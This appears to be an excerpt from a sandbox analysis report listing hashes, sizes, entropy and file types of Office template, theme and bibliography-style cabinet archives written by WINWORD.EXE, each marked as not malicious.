                                                                                                                                                        SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                                                                                        SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                                                                                        SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):30957
                                                                                                                                                        Entropy (8bit):7.808231503692675
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                                                                                                                        MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                                                                                                                        SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                                                                                                                        SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                                                                                                                        SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31083
                                                                                                                                                        Entropy (8bit):7.814202819173796
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                                                                                        MD5:89A9818E6658D73A73B642522FF8701F
                                                                                                                                                        SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                                                                                        SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                                                                                        SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20554
                                                                                                                                                        Entropy (8bit):7.612044504501488
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                                                                                        MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                                                                                        SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                                                                                        SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                                                                                        SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21357
                                                                                                                                                        Entropy (8bit):7.641082043198371
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                                                                                        MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                                                                                        SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                                                                                                                        SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                                                                                        SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31471
                                                                                                                                                        Entropy (8bit):7.818389271364328
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                                                                                                                        MD5:91AADBEC4171CFA8292B618492F5EF34
                                                                                                                                                        SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                                                                                                                        SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                                                                                                                        SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):42788
                                                                                                                                                        Entropy (8bit):7.89307894056
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                                                                                                                        MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                                                                                                                        SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                                                                                                                        SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                                                                                                                        SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):43653
                                                                                                                                                        Entropy (8bit):7.899157106666598
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                                                                                                                        MD5:DA3380458170E60CBEA72602FDD0D955
                                                                                                                                                        SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                                                                                                                        SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                                                                                                                        SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):46413
                                                                                                                                                        Entropy (8bit):7.9071408623961394
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                                                                                                                        MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                                                                                                                        SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                                                                                                                        SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                                                                                                                        SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):222992
                                                                                                                                                        Entropy (8bit):7.994458910952451
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                                                                                        MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                                                                                        SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                                                                                        SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                                                                                        SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):271273
                                                                                                                                                        Entropy (8bit):7.995547668305345
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                                                                                        MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                                                                                        SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                                                                                        SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                                                                                        SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):276650
                                                                                                                                                        Entropy (8bit):7.995561338730199
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                                                                                        MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                                                                                        SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                                                                                        SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                                                                                        SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):295527
                                                                                                                                                        Entropy (8bit):7.996203550147553
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                                                                                        MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                                                                                        SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                                                                                        SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                                                                                        SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):261258
                                                                                                                                                        Entropy (8bit):7.99541965268665
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                                                                                        MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                                                                                        SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                                                                                        SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                                                                                        SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):307348
                                                                                                                                                        Entropy (8bit):7.946833019996754
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx:b36yiWH/LRS2CJl1
                                                                                                                                                        MD5:D8061BC23061E573E56A363CDE295386
                                                                                                                                                        SHA1:C09441055BF4824354AB7913A39D3B5B1986350E
                                                                                                                                                        SHA-256:3CEC8CE1570795767AE8585F158D653021D0F7B3BEBE5B2A34B4D056BFD702E7
                                                                                                                                                        SHA-512:2554D45FE1A05C158D106130654D579AC4F118371DE554E6054DB93237261A488A5219227367A95928A1E435CFAB9DED0B464CD99BF9D4D1E57D7BFD5AC56228
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):230916
                                                                                                                                                        Entropy (8bit):7.994759087207758
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                                                                                                                        MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                                                                                                                        SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                                                                                                                        SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                                                                                                                        SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):550906
                                                                                                                                                        Entropy (8bit):7.998289614787931
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                                                                                        MD5:1C12315C862A745A647DAD546EB4267E
                                                                                                                                                        SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                                                                                        SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                                                                                                                        SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):723359
                                                                                                                                                        Entropy (8bit):7.997550445816903
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                                                                                        MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                                                                                        SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                                                                                        SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                                                                                        SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):640684
                                                                                                                                                        Entropy (8bit):7.99860205353102
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                                                                                        MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                                                                                        SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                                                                                                                        SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                                                                                        SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):698244
                                                                                                                                                        Entropy (8bit):7.997838239368002
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                                                                                        MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                                                                                        SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                                                                                        SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                                                                                        SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):953453
                                                                                                                                                        Entropy (8bit):7.99899040756787
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                                                                                        MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                                                                                        SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                                                                                        SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                                                                                        SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1065873
                                                                                                                                                        Entropy (8bit):7.998277814657051
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                                                                                        MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                                                                                        SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                                                                                        SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                                                                                        SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1097591
                                                                                                                                                        Entropy (8bit):7.99825462915052
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                                                                                        MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                                                                                        SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                                                                                        SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                                                                                        SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1310275
                                                                                                                                                        Entropy (8bit):7.9985829899274385
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                                                                                        MD5:9C9F49A47222C18025CC25575337A965
                                                                                                                                                        SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                                                                                        SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                                                                                        SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1766185
                                                                                                                                                        Entropy (8bit):7.9991290831091115
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                                                                                        MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                                                                                        SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                                                                                        SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                                                                                        SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1881952
                                                                                                                                                        Entropy (8bit):7.999066394602922
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
